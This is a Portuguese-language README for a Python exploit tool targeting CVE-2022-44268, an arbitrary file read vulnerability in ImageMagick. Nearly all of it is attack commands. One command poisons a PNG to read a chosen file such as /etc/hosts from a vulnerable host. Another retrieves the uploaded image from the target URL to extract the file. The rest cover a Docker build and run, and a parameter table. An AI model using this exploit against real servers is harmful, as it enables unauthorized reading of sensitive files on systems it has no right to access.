
Exploit baseado em Python para CVE-2022-44268, uma vulnerabilidade de leitura arbitrária de arquivos no ImageMagick. Envenena imagens PNG para ler arquivos sensíveis de hosts vulneráveis via upload web.
CVE-2022-44268 Leitura Arbitrária de Arquivos do ImageMagick
Envenenar a imagem ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Carregue a imagem PNG envenenada.
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Verifique se o exploit foi bem-sucedido 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Construir
docker build -t cve-2022-44268 .
Executar
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| Parâmetro | Descrição | Tipo |
|---|---|---|
| --url | A URL da imagem PNG carregada | String |
| --image | Arquivo PNG de entrada | Arquivo |
| --output | Arquivo PNG de saída | Arquivo |
| --file-to-read | Arquivo para ler do host vulnerável | String |